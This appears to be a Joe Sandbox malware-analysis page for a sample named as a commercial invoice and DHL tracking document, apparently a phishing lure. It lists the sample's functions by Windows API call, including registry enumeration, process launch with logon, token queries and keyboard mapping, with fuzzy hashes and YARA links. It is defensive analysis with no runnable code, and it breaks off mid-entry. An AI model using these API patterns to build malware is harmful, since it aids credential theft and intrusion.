Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 1209449369a141f218ea762d0ca84d0722408024e3814443191bd0c5c44e8fa8
Instruction ID: 00415eec5666cb23733ad8e989fef993a8383569e9390185dd5525917ea16664
Opcode Fuzzy Hash: 1209449369a141f218ea762d0ca84d0722408024e3814443191bd0c5c44e8fa8
Instruction Fuzzy Hash: 4151F472A00217BBEB259F64CC81EBF77A9EF48714F16962AFC05D6241DB38DC40C668

Function 0048BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

Part of subcall function 0048C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0048B6AE,?,?), ref: 0048C9B5
Part of subcall function 0048C998: _wcslen.LIBCMT ref: 0048C9F1
Part of subcall function 0048C998: _wcslen.LIBCMT ref: 0048CA68
Part of subcall function 0048C998: _wcslen.LIBCMT ref: 0048CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0048BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048BD25
RegCloseKey.ADVAPI32(00000000), ref: 0048BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0048BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048BDF3
RegCloseKey.ADVAPI32(?), ref: 0048BDFF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 52879733c9f91df2255d09af2a88d47b29303882c72c53975a58d404b4cabe8e
Instruction ID: 66867387895693e3d3c5b46cb5408c9a4ea2bc678d8421b78e890b6d7f12048b
Opcode Fuzzy Hash: 52879733c9f91df2255d09af2a88d47b29303882c72c53975a58d404b4cabe8e
Instruction Fuzzy Hash: B4818D70208241AFD714EF24C891E2BBBE5FF84308F14896EF4594B2A2DB35ED45CB96

Function 0045F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0045F7B9
SysAllocString.OLEAUT32(00000001), ref: 0045F860
VariantCopy.OLEAUT32(0045FA64,00000000), ref: 0045F889
VariantClear.OLEAUT32(0045FA64), ref: 0045F8AD
VariantCopy.OLEAUT32(0045FA64,00000000), ref: 0045F8B1
VariantClear.OLEAUT32(?), ref: 0045F8BB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 8464a39d859a127f84f550e53cba53dc195430a0e78e7046eea1524d95f52ba1
Instruction ID: fad3531c477c6a02c86f7eb964f9f53b5c2f0619bb92a20d51ab317aa8b873ef
Opcode Fuzzy Hash: 8464a39d859a127f84f550e53cba53dc195430a0e78e7046eea1524d95f52ba1
Instruction Fuzzy Hash: 5E51A371600310ABCF106B66D895B29B3A8EF45315B24847BED06DF293DB789C8D879F

Function 0047910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00407620: _wcslen.LIBCMT ref: 00407625

Part of subcall function 00406B57: _wcslen.LIBCMT ref: 00406B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 004794E5
_wcslen.LIBCMT ref: 00479506
_wcslen.LIBCMT ref: 0047952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00479585

Strings

X, xrefs: 00479412

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 28146a6108c27a045355e57ec61a2cdf085534550efc8881065475766990f8e9
Instruction ID: f9c8aca44ffe02e8de6b54035f4c347787dd5f254e66c9c0782f12f4ab8f18d5
Opcode Fuzzy Hash: 28146a6108c27a045355e57ec61a2cdf085534550efc8881065475766990f8e9
Instruction Fuzzy Hash: 48E1A5315083109FD714EF25C881AAAB7E4FF85318F04896EF8899B392DB34DD05CB9A

Function 0041920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00419BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00419BB2

BeginPaint.USER32(?,?,?), ref: 00419241
GetWindowRect.USER32(?,?), ref: 004192A5
ScreenToClient.USER32(?,?), ref: 004192C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004192D3
EndPaint.USER32(?,?,?,?,?), ref: 00419321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004571EA

Part of subcall function 00419339: BeginPath.GDI32(00000000), ref: 00419357

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: e5d6b84a52f782b2fb308e5e2c2c967a2313def70907e618fda16057d2da507d
Instruction ID: 4f764ae9922d03d679b2e388ac5059885de830c2255333fd05545b5e445d6b2d
Opcode Fuzzy Hash: e5d6b84a52f782b2fb308e5e2c2c967a2313def70907e618fda16057d2da507d
Instruction Fuzzy Hash: 7941AF70105200AFD710DF65DCA4FAA7BA8EB59325F04067BFD64872B2C7349C85DB6A

Function 004707EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0047080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00470847
EnterCriticalSection.KERNEL32(?), ref: 00470863
LeaveCriticalSection.KERNEL32(?), ref: 004708DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004708F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00470921

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 51f080702d34bee41d72098e715618b13328fb2921cff1416bc148081afd3483
Instruction ID: 2bf16e88385f0d526a50965f8e6b83eeec02fa5b23a39e33bc05af52056d0848
Opcode Fuzzy Hash: 51f080702d34bee41d72098e715618b13328fb2921cff1416bc148081afd3483
Instruction Fuzzy Hash: 63416B71A00205EFDF14AF55DC85AAA77B8FF04304F1480BAED049A297DB34DE65DBA8

Function 004981DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0045F3AB,00000000,?,?,00000000,?,0045682C,00000004,00000000,00000000), ref: 0049824C
EnableWindow.USER32(00000000,00000000), ref: 00498272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 004982D1
ShowWindow.USER32(00000000,00000004), ref: 004982E5
EnableWindow.USER32(00000000,00000001), ref: 0049830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0049832F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 42e7f4963a8afe54bfbb12e54d65d3cc8dc09abdcee0118ae871e9cfb65851b4
Instruction ID: dc6b8b90b41af4a5bb97c5c9f48c87ff949981370308f279306f208454a512ee
Opcode Fuzzy Hash: 42e7f4963a8afe54bfbb12e54d65d3cc8dc09abdcee0118ae871e9cfb65851b4
Instruction Fuzzy Hash: 52417074601644AFDF21CF19C899BA57FE0BB4B714F1841FEE9084B272CB36A841CB58

Function 00464C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00464C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00464CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00464CEA
_wcslen.LIBCMT ref: 00464D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00464D10
_wcsstr.LIBVCRUNTIME ref: 00464D1A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: ce908e871c3622259a0b6e1049d3f041aff0f8789e6fb882f6a6a7032b497339
Instruction ID: 464251b75fc9d2c55dfd6984dfe7a6015da58f2d422b8e3497c08f751bee6539
Opcode Fuzzy Hash: ce908e871c3622259a0b6e1049d3f041aff0f8789e6fb882f6a6a7032b497339
Instruction Fuzzy Hash: 7E212972604210BBEF155B36AC49E7B7B9CDF95750F10403FF805CA291EA69CC4192A9

Function 0047581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00403AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00403A97,?,?,00402E7F,?,?,?,00000000), ref: 00403AC2

_wcslen.LIBCMT ref: 0047587B
CoInitialize.OLE32(00000000), ref: 00475995
CoCreateInstance.OLE32(0049FCF8,00000000,00000001,0049FB68,?), ref: 004759AE
CoUninitialize.OLE32 ref: 004759CC

Strings

.lnk, xrefs: 00475876, 004758C1, 00475985

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 14366bc2929af0f7973c6ac102d43ed3d529afee1c66802db9191eb9b24067af
Instruction ID: 936ccbb4a6bc0a7597216a995219925d773478aa535829475d81f68a9eda2d51
Opcode Fuzzy Hash: 14366bc2929af0f7973c6ac102d43ed3d529afee1c66802db9191eb9b24067af
Instruction Fuzzy Hash: B3D166B06047019FC704DF25C480A6ABBE5FF89718F14886EF8899B3A1D779EC45CB96

Function 0046175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00460FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00460FCA
Part of subcall function 00460FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00460FD6
Part of subcall function 00460FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00460FE5
Part of subcall function 00460FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00460FEC
Part of subcall function 00460FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00461002

GetLengthSid.ADVAPI32(?,00000000,00461335), ref: 004617AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004617BA
HeapAlloc.KERNEL32(00000000), ref: 004617C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 004617DA
GetProcessHeap.KERNEL32(00000000,00000000,00461335), ref: 004617EE
HeapFree.KERNEL32(00000000), ref: 004617F5

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 0217f33d3a09f36f6fd57d8d795c311aac87a1b448ea70626e62691d88011ea3
Instruction ID: f7763e6a00078c504dd556e881d6e2e8fceb37f6314b3f51a0856c51d334f811
Opcode Fuzzy Hash: 0217f33d3a09f36f6fd57d8d795c311aac87a1b448ea70626e62691d88011ea3
Instruction Fuzzy Hash: D611D031500205FFDB109FA4CC89BAFBBB9EF42356F18402AF44197220E739AA40CB69

Function 004614CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004614FF
OpenProcessToken.ADVAPI32(00000000), ref: 00461506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00461515
CloseHandle.KERNEL32(00000004), ref: 00461520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0046154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00461563

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 0004ec5b68ba4ca5e08fe2f58a29e972c16729a28a51e0587da2401d2513db42
Instruction ID: 8ad008c533a390392ba9902b6fce0b931663af64d2e56dd3b277a9d789bafa8b
Opcode Fuzzy Hash: 0004ec5b68ba4ca5e08fe2f58a29e972c16729a28a51e0587da2401d2513db42
Instruction Fuzzy Hash: DB115972501209BBDF118FA8EE89BDE7BA9EF48744F084026FA05A2160D3758E60DB65

Function 00423382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00423379,00422FE5), ref: 00423390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0042339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004233B7
SetLastError.KERNEL32(00000000,?,00423379,00422FE5), ref: 00423409

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a32605ef527eaa469144d2134be0da9f5a51a31bd8af4ba380e7972ee934d743
Instruction ID: e20225832f620dfe49ce4b56b4c60c5507e4676c0e6068a5d99a8cdab85c0515
Opcode Fuzzy Hash: a32605ef527eaa469144d2134be0da9f5a51a31bd8af4ba380e7972ee934d743
Instruction Fuzzy Hash: 4201D232308331AAA6242BB67CC5A272AA8EB1577A7A0027FF810802F1EE1D4E02514C

Function 00432D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00435686,00443CD6,?,00000000,?,00435B6A,?,?,?,?,?,0042E6D1,?,004C8A48), ref: 00432D78
_free.LIBCMT ref: 00432DAB
_free.LIBCMT ref: 00432DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0042E6D1,?,004C8A48,00000010,00404F4A,?,?,00000000,00443CD6), ref: 00432DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0042E6D1,?,004C8A48,00000010,00404F4A,?,?,00000000,00443CD6), ref: 00432DEC
_abort.LIBCMT ref: 00432DF2

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 5e0add9b765b87a898494888a9c51f6034469cae76b700c4ba7ec96355a0c39e
Instruction ID: bc5def4ff60a7aec5a6b9e7cc89536806b7c65568b5938bd00be58f42aabd56c
Opcode Fuzzy Hash: 5e0add9b765b87a898494888a9c51f6034469cae76b700c4ba7ec96355a0c39e
Instruction Fuzzy Hash: 3EF028355456102BC2623736BE06F5B3559AFCE7B5F24203FF824922D2EEEC8802516C

Function 00498A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00419639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00419693
Part of subcall function 00419639: SelectObject.GDI32(?,00000000), ref: 004196A2
Part of subcall function 00419639: BeginPath.GDI32(?), ref: 004196B9
Part of subcall function 00419639: SelectObject.GDI32(?,00000000), ref: 004196E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00498A4E
LineTo.GDI32(?,00000003,00000000), ref: 00498A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00498A70
LineTo.GDI32(?,00000000,00000003), ref: 00498A80
EndPath.GDI32(?), ref: 00498A90
StrokePath.GDI32(?), ref: 00498AA0

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 7546945f018009c9331fba3f7a2bb4d016bfd2e7c7688a7605cf59210c7cd9fc
Instruction ID: fbe2cd0df6ce29d36aa60cb89ce8f05a0eb0660468d66753ff6b58e60e770502
Opcode Fuzzy Hash: 7546945f018009c9331fba3f7a2bb4d016bfd2e7c7688a7605cf59210c7cd9fc
Instruction Fuzzy Hash: C1110976000108FFDF129F94DC88EAA7F6DEB08354F008076FA199A1A1C7719D55DFA4

Function 004651FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00465218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00465229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465230
ReleaseDC.USER32(00000000,00000000), ref: 00465238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0046524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00465261

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 8faba0ee30be5cb13a1b2ecbb04910e715b6cec58ab827c338ca8977ae4f2e7f
Instruction ID: b580059f6be7f40f5b932cc52e30610f12d628495f3ea0f87bdd437489a17fc3
Opcode Fuzzy Hash: 8faba0ee30be5cb13a1b2ecbb04910e715b6cec58ab827c338ca8977ae4f2e7f
Instruction Fuzzy Hash: 3B014F75A00718BBEB109BA69C89A5EBFB8EB58751F044076FA04A7381D6709C05CFA5

Function 00401BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00401BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00401BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00401C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00401C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00401C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00401C22

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 1a522003fa8669d509f293f71d3ce78c7a9fdbd6614cce04aed6fde4746875c8
